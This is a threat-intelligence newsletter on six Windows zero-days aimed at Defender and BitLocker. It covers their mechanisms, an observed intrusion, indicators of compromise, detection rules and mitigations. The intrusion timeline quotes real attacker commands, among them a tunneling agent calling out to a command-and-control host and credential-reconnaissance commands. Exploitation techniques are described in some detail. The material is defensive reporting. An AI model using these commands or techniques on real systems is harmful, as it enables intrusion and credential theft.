Welcome to Intruvent Edge, our bi-weekly technical deep dive into a current cyber threat. If you found us through Prevent This, our weekly community newsletter covering cybersecurity for everyone, you’re in the right place. Both live on the same Substack. Feel free to share either one. We’re glad you’re here.

The Short Version

Since early April, a single anonymous security researcher has released six Windows zero-day exploits targeting Microsoft Defender, BitLocker, and core Windows internals. Three have been exploited in the wild by threat actors linked to Russian infrastructure. Three have been added to CISA’s Known Exploited Vulnerabilities catalog. As of this writing, only three of the six have patches. The researcher has promised more for June and July.

The researcher, operating under the alias Nightmare-Eclipse, claims to be a former Microsoft employee who was personally and professionally destroyed by the company. Whether that justifies dropping weaponizable exploit code on the open internet is a question the security community is actively debating. What is not debatable: the exploits work, attackers are using them, and your Defender-protected endpoints may be less protected than your dashboard suggests.

This article covers the technical details of each exploit, the observed attack chain, indicators of compromise you can hunt for today, and what is likely coming next.

The Backstory

On March 27, 2026, an anonymous account appeared on GitHub. Within days, a blog post followed: “I never wanted to reopen a blog and a new GitHub account to drop code. But someone violated our agreement and left me homeless with nothing.”

The author, using the aliases Nightmare-Eclipse, Chaotic Eclipse, and Dead Eclipse, claimed a prior professional relationship with Microsoft that ended in what they describe as deliberate personal destruction. “I was told personally by them that they will ruin my life and they did.” They alleged that Microsoft revoked their MSRC (Microsoft Security Response Center) reporting account, ignored requests for explanation, and “mopped the floor with me and pulled every childish game they could.”

Whether the grievance is legitimate is unknown. What is clear from the exploit code is that this person has deep, insider-level knowledge of Windows Defender internals, the Cloud Files API, NTFS transactional mechanisms, and MSRC processes. Multiple security outlets describe them as a “rumored former Microsoft employee.” The technical quality of the work is consistent with that assessment.

What followed was a methodical, escalating campaign: six zero-day exploits released over six weeks, each timed for maximum impact, each targeting a different Windows security surface.

The Six Exploits

1. BlueHammer (CVE-2026-33825) — April 2

Type: Local Privilege Escalation | CVSS: 7.8 | Status: Patched (April 14)

BlueHammer exploits a time-of-check to time-of-use (TOCTOU) race condition in Defender’s threat remediation engine. When Defender detects a malicious file, it performs a cleanup operation with SYSTEM-level privileges. BlueHammer interrupts that operation at a precise moment using an opportunistic lock (oplock), swaps the target path to a junction pointing at C:\Windows\System32, and lets Defender complete the write into the protected directory.

The extended chain goes further: it triggers a signature update that tricks Defender into copying the Security Account Manager (SAM) database, extracts NT password hashes, temporarily changes user passwords, and uses the new credentials to escalate to SYSTEM.

The proof-of-concept binary was distributed as FunnyApp.exe. The filename is trivial to change. Detection must focus on the behavior: Defender writing PE files into System32, NTFS junction creation in user directories targeting protected paths, and non-LSASS processes loading samlib.dll.

MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1574 (Hijack Execution Flow)

2. UnDefend (CVE-2026-45498) — April 12

Type: Defense Evasion | CVSS: 4.0 | Status: Patched (May 19-20)

UnDefend targets Defender’s update mechanism rather than escalating privileges directly. It operates in two modes:

Passive mode silently blocks all signature updates. Defender keeps running, but its threat intelligence freezes at whatever signatures were current when the exploit ran. New malware walks right past. The telltale indicator: Windows Update Error Code 80070643appears during signature update attempts.

Aggressive mode waits for Microsoft to push a major platform update, then kills Defender entirely. The trigger is Microsoft’s own update mechanism.

The critical deception in both modes: Defender still reports itself as healthy to the management console. Dashboards show green. Compliance tools show protected. Everything looks fine while the endpoint is blind.

MITRE ATT&CK: T1562.001 (Impair Defenses: Disable or Modify Tools)

3. RedSun (CVE-2026-41091) — April 15-16

Type: Local Privilege Escalation | CVSS: Not scored at disclosure | Status: Patched (May 19-20)

RedSun is the most technically sophisticated of the six. It abuses Defender’s handling of cloud-tagged files via the Windows Cloud Files API.

The exploit registers a sync root using the provider name “SERIOUSLYMSFT” (a direct-match IOC reflecting the researcher’s frustration), drops a decoy executable named TieringEngineService.exe with a reversed EICAR string, converts it to a cloud placeholder, then uses an oplock race condition to redirect Defender’s rollback operation into C:\Windows\System32. Defender, running as SYSTEM, overwrites the legitimate TieringEngineService.exe with attacker-controlled content.

The final step activates the Storage Tiers Management Engine via DCOM, which executes the now-replaced binary. The payload detects the SYSTEM context, reads the target session ID from a named pipe (\\.\pipe\REDSUN), and spawns an interactive SYSTEM shell in the user’s active session.

Reliability: approximately 100% on fully patched April 2026 systems. No kernel exploit, no driver, no administrator interaction required. Reverse engineering of MpSvc.dllconfirmed that no reparse point validation exists anywhere in the write-back chain.

MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1574 (Hijack Execution Flow)

4. YellowKey (CVE-2026-45585) — May 12

Type: BitLocker Security Feature Bypass | CVSS: 6.8 | Status: Mitigation only (no full patch)

Released one day after May Patch Tuesday, YellowKey exploits NTFS Transactional replay in the Windows Recovery Environment to bypass BitLocker full-disk encryption on machines using TPM-only configuration.

Specially crafted files in an FsTx directory structure on a USB drive instruct the system to replay NTFS transaction logs during boot. The crafted transactions delete winpeshl.inifrom the recovery environment. When WinRE launches, a command prompt appears instead of the normal recovery tools. Because TPM-only mode auto-decrypts on boot without user input, the attacker has unrestricted access to the BitLocker-protected volume.

The researcher described YellowKey as “one of the most insane discoveries I ever found” and claimed TPM+PIN configurations are also vulnerable, but declined to release that proof-of-concept. The current public exploit requires physical access to the original device (stolen drives alone cannot be unlocked because the TPM is bound to the motherboard).

Microsoft issued mitigation guidance on May 20 but has not released a full patch.

5. GreenPlasma (No CVE) — May 13

Type: Local Privilege Escalation (partial) | Status: Unpatched

Also released the day after May Patch Tuesday. GreenPlasma targets ctfmon.exe, the text input service that runs as SYSTEM in every interactive Windows session. An unprivileged user can create arbitrary memory-section objects within SYSTEM-writable directories by manipulating registry permissions.

The researcher deliberately released an incomplete version, calling it a “capture the flag challenge.” In its current state, it triggers a UAC consent prompt rather than delivering a silent SYSTEM shell. A motivated attacker could complete the final step independently.

6. MiniPlasma (No CVE) — Late May

Type: Local Privilege Escalation | Status: Unpatched (fix appears in Insider Canary only)

MiniPlasma is perhaps the most embarrassing for Microsoft. It targets cldflt.sys, the Windows Cloud Files Mini Filter Driver. The specific flaw, in the HsmOsBlockPlaceholderAccess routine, was originally discovered by Google Project Zero researcher James Forshaw in September 2020. Microsoft assigned it CVE-2020-17103 and reportedly patched it in December 2020.

Nightmare-Eclipse’s claim: “The exact same issue that was reported to Microsoft by Google Project Zero is actually still present, unpatched. I’m unsure if Microsoft just never patched the issue or the patch was silently rolled back at some point.”

BleepingComputer and security researcher Will Dormann independently confirmed that the original 2020 proof-of-concept works on fully patched May 2026 Windows 11. A standard user account gains a SYSTEM-level command prompt. The exploit does not work on Insider Preview Canary builds, suggesting a fix is in development but has not reached production.

The Cloud Files Mini Filter Driver is present by default on most Windows 11 installations because of OneDrive integration. The attack surface is broadly deployed.

The Chain: How They Work Together

Individually, each exploit is a serious vulnerability. Combined, they form a complete offensive toolkit:

1. Blind the guard: UnDefend freezes Defender’s signatures or kills it entirely while reporting healthy status to the management console.

2. Escalate to SYSTEM: BlueHammer, RedSun, or MiniPlasma, three independent paths to SYSTEM-level access through three different Windows subsystems. If one is patched, the attacker has two alternatives.

3. Access encrypted devices: YellowKey bypasses BitLocker on physically accessible machines.

4. Future persistence: GreenPlasma provides a fourth SYSTEM path through a different subsystem once the researcher (or someone else) completes the final step.

The sequencing matters. The Huntress-observed attack chain was: enter via stolen VPN credentials, deploy UnDefend to blind Defender, escalate via BlueHammer or RedSun, dump credentials, move laterally, deploy ransomware. First blind the guard dog, then walk through the front door with admin keys.

In the Wild: The Huntress Intrusion

Huntress Labs published the definitive incident report on April 20, documenting the first confirmed real-world intrusion using Nightmare-Eclipse tooling.

April 10: FunnyApp.exe (BlueHammer) staged in C:\Users\[REDACTED]\Pictures\and quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.

April 15, 13:44 UTC: Unauthorized SSL VPN connection from 78.29.48[.]29(Russia) to the victim’s FortiGate firewall using stolen credentials.

April 16: RedSun attempted. UnDefend deployed (notably with the misspelled flag -agressive, suggesting the operator was not the author of the tooling). Post-exploitation commands: whoami /priv, cmdkey /list, net group. Then: agent.exe -server staybud.dpdns[.]org:443 -hide, deploying BeigeBurrow, a Go-based tunneling agent using HashiCorp’s Yamux library for persistent TCP relay.

An instructive detail: despite executing multiple tools, three of four failed. Defender quarantined BlueHammer. RedSun never produced a result. UnDefend was operated incorrectly. Only BeigeBurrow successfully connected outbound. The attackers had access to sophisticated weaponry and fumbled the execution. That will not always be the case.

Indicators of Compromise

File Indicators

• FunnyApp.exe (BlueHammer PoC, staged in \Pictures\)

• RedSun.exe (staged in \Downloads\)

• undef.exe / UnDefend.exe (staged in \Downloads\ks\ or \Downloads\kk\)

• z.exe (renamed exploit binary)

• agent.exe (BeigeBurrow tunneling agent)

• Modified TieringEngineService.exe in C:\Windows\System32\

BeigeBurrow SHA-256: a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c

Defender detection name: Exploit:Win32/DfndrPEBluHmr.BZ

Network Indicators

• staybud.dpdns[.]org (BeigeBurrow C2, port 443)

• 78.29.48[.]29 (Russia, initial VPN access)

• 212.232.23[.]69 (Singapore, follow-on)

• 179.43.140[.]214 (Switzerland, follow-on)

Behavioral Indicators

• Cloud sync provider registration using the string “SERIOUSLYMSFT” (exact-match RedSun indicator)

• Named pipe creation: \\.\pipe\REDSUN

• Modifications to C:\Windows\System32\TieringEngineService.exe

• Repeated Windows Update Error Code 80070643 during Defender signature updates (UnDefend passive mode)

• Defender signature timestamp stale beyond 72 hours despite dashboard showing healthy status

• MsMpEng.exe writing PE/DLL/driver files to paths outside ProgramData\Microsoft\Windows Defender

• NTFS junction creation in user directories targeting C:\Windows\System32

• whoami /priv, cmdkey /list, net group spawned from unexpected parent processes

• agent.exe with -server and -hide flags

• VPN authentication from the same account across multiple countries within short timeframes

Detection and Hunting Guidance

Priority Action: Verify Defender Is Actually Working

Do not trust the dashboard. UnDefend’s entire purpose is to make Defender appear healthy while it is blind. Query the actual signature timestamp directly across your fleet:

Get-MpComputerStatus | Select-Object AntivirusSignatureLastUpdated

Alert on any host where signatures are older than 72 hours. If multiple endpoints report Error Code 80070643 simultaneously, investigate immediately. Clustered signature update failures are the highest-fidelity indicator currently available for UnDefend in passive mode.

Verify Patch Level

Confirm Defender Antimalware Platform version 4.18.26040.7 or later is deployed across all endpoints. This version patches BlueHammer, RedSun, and UnDefend. Confirm engine version 1.1.26040.8 or later for the related heap-based buffer overflow (CVE-2026-45584).

Sigma Rules

The BlueHammerFix repository (github.com/technoherder/BlueHammerFix) provides 7 Sigma rules and 4 YARA rules covering the full attack chain. Key rules to deploy:

• bluehammer_samlib_load.yml — Non-LSASS process loading samlib.dll

• bluehammer_rapid_password_change.yml — Password change-logon-restore cycle

• bluehammer_junction_basenamed.yml — Junction to BaseNamedObjects

• bluehammer_cloudfiles_abuse.yml — Cloud Files API invocation by non-provider process

• bluehammer_lsa_bootkey_access.yml — LSA boot key registry access

KQL Detection Packs

Two community-maintained detection packs for Microsoft Defender XDR and Sentinel are available on GitHub:

• Letlaka/redsun-bluehammer-undefend-detection-pack: Full attack chain queries for all three patched exploits, plus cross-family hunting for BeigeBurrow follow-on activity. Uses DeviceFileEvents, DeviceProcessEvents, and DeviceRegistryEvents tables.

• 3ch0p01nt/RedSun_Undefend: Hunt queries and defensive recommendations specifically for RedSun and UnDefend.

Sysmon Event IDs to Monitor

• Event ID 1 (ProcessCreate): whoami /priv, cmdkey /list, net group from unexpected parents; agent.exe with -server/-hide flags

• Event ID 11 (FileCreate): Suspicious filenames in \Pictures\ or \Downloads\; modifications to TieringEngineService.exe; Defender writing binaries to non-standard paths

• Event ID 12/13/14 (Registry): Registry modifications in DEFAULT hive (MiniPlasma); LSA boot key access (BlueHammer)

• Defender Operational Log 1116-1117: Detection and remediation events (correlate with TOCTOU timing)

YARA and Network Rules

• BeigeBurrow YARA rule: github.com/RussianPanda95/Yara-Rules/blob/main/BeigeBurrow/win_mal_BeigeBurrow.yar

• BlueHammerFix YARA rules: 4 rules available in the technoherder repository

• Suricata rule SID 2026041701: detects potential RedSun/BlueHammer/UnDefend downloads

What Should Organizations Do

Immediate Actions

1. Verify Defender platform version 4.18.26040.7 or later on every endpoint. This patches BlueHammer, RedSun, and UnDefend.

2. Query signature freshness directly using Get-MpComputerStatus. Do not rely on dashboard indicators.

3. Baseline the SHA-256 hash of TieringEngineService.exe on all endpoints. Any modification triggers an immediate investigation.

4. Deploy the Sigma and KQL detection rules listed above.

5. Apply YellowKey mitigations: Enforce TPM+PIN for BitLocker (the published exploit only works against TPM-only configurations). Review Microsoft’s May 20 mitigation guidance for the WinRE registry workaround.

Ongoing Posture

1. Monitor for MiniPlasma: No patch exists for production Windows. The cldflt.sys driver is present on most Windows 11 installations via OneDrive. Watch for the fix in the June 10 Patch Tuesday.

2. Audit SSL VPN credentials: The observed intrusion entered through stolen FortiGate VPN credentials. Enforce MFA on all remote access, review for impossible-travel patterns, and rotate credentials for any accounts with unexplained activity.

3. Prepare for June and July: Nightmare-Eclipse has promised a “big surprise” for the June 10 Patch Tuesday and has threatened a major disclosure on July 14. The researcher has followed through on every prior threat. Plan for accelerated patch cycles around those dates.

4. Do not depend solely on Defender: Three of the six exploits specifically target Defender’s internal mechanisms. Organizations relying exclusively on Defender for endpoint protection should consider layered defenses: a secondary EDR agent, application whitelisting, or network-level detection.

The Responsible Disclosure Debate

Microsoft’s MSRC published a blog post calling out the anonymous researcher for bypassing coordinated disclosure: “The details of these vulnerabilities were not shared with Microsoft prior to release, and the disclosures put our customers at unnecessary risk.” Microsoft has described uncoordinated disclosure as “never justifiable” and used legal language broad enough to cover “both actual attackers and researchers who enable them with proof of concepts.”

The security community’s reaction was skeptical. Researchers at SpecterOps and TrustedSec shared their own frustrating experiences with MSRC. Jason Lang, Team Lead of Targeted Operations at TrustedSec, wrote: “I’ve heard nothing but horror stories about those submitting to MSRC, so it’s no surprise that this would be the fallout.”

Barracuda Networks took the opposite position, explicitly classifying Nightmare-Eclipse as a “malicious actor, not a whistleblower, not a responsible disclosure advocate, and not a neutral researcher.”

The researcher claims they reported through proper channels first and were rebuffed. At the same time, the Huntress intrusion confirms that real organizations were compromised by real attackers using this exploit code within days of its release. The grievance may be legitimate. The collateral damage is also real.

GitHub (owned by Microsoft) banned the researcher’s account around May 23. GitLab suspended the account days later. Unfortunately, clones spread within hours. The bans may have generated more sympathy for the researcher than the original disclosures did.

What Comes Next

Nightmare-Eclipse has followed through on every prior threat. The escalation pattern is deliberate: privilege escalation, then defense evasion, then BitLocker bypass, then hints at remote code execution. Each release was timed to maximize embarrassment, landing on or immediately after Patch Tuesday.

Three things to watch:

• June 10 (Patch Tuesday): The researcher has promised a “big surprise.” They have also claimed they will “drag other companies into this,” suggesting exploits targeting vendors beyond Microsoft.

• July 14: Nightmare-Eclipse has publicly announced a major disclosure on this date. The researcher previously hinted at releasing remote code execution vulnerabilities, which would be a qualitative escalation from the local privilege escalation and defense evasion exploits released so far.

• The “dead man’s switch”: The researcher claims to have deployed an automated system that will release additional exploits if certain conditions are met. Security experts note: “They claim to have a dead man’s switch with more ready to go. This researcher has followed through on every prior threat.”

We will continue tracking this story. If the June or July disclosures materialize, expect a follow-up edition.

Patch Status Summary

• BlueHammer (CVE-2026-33825): Patched, April 14. Defender Platform 4.18.26030.3011.

• UnDefend (CVE-2026-45498): Patched, May 19-20. Defender Platform 4.18.26040.7.

• RedSun (CVE-2026-41091): Patched, May 19-20. Defender Platform 4.18.26040.7.

• YellowKey (CVE-2026-45585): Mitigation guidance only. No full patch.

• GreenPlasma: Unpatched. No CVE assigned.

• MiniPlasma: Unpatched. Fix appears in Insider Canary builds only. Relates to CVE-2020-17103.

Next Patch Tuesday: June 10, 2026.

Sources

• Barracuda Networks: Six Zero-Days, Six Weeks and One Big Grudge (May 19, 2026)

• Huntress Labs: Nightmare-Eclipse Tooling in Real-World Intrusion (April 20, 2026)

• Vectra AI: When the Defender Becomes the Door

• Picus Security: BlueHammer & RedSun Explained

• Cyderes: Inside the Windows Zero-Day (BlueHammer)

• Cyderes: RedSun Zero-Day

• SOCRadar: BlueHammer, RedSun, and UnDefend

• BleepingComputer: Disgruntled Researcher Leaks BlueHammer

• BleepingComputer: MiniPlasma Zero-Day Gives SYSTEM Access

• BleepingComputer: YellowKey BitLocker Bypass

• The Hacker News: Microsoft Slams Public Zero-Day Disclosures

• The Hacker News: MiniPlasma Windows 0-Day

• The Register: Disgruntled Researcher Releases Two More Zero-Days

• CyberNews: GitHub Bans Researcher

• CISA KEV: CVE-2026-33825 (April 22, 2026)

• CISA KEV: CVE-2026-41091 and CVE-2026-45498 (May 20, 2026)

• Intruvent Technologies, Golden CTI Database (Codex), queried May 28, 2026

Intruvent Edge is a bi-weekly threat intelligence newsletter from Intruvent Technologies. For custom, localized cyber threat intelligence, visit intruvent.com/brace.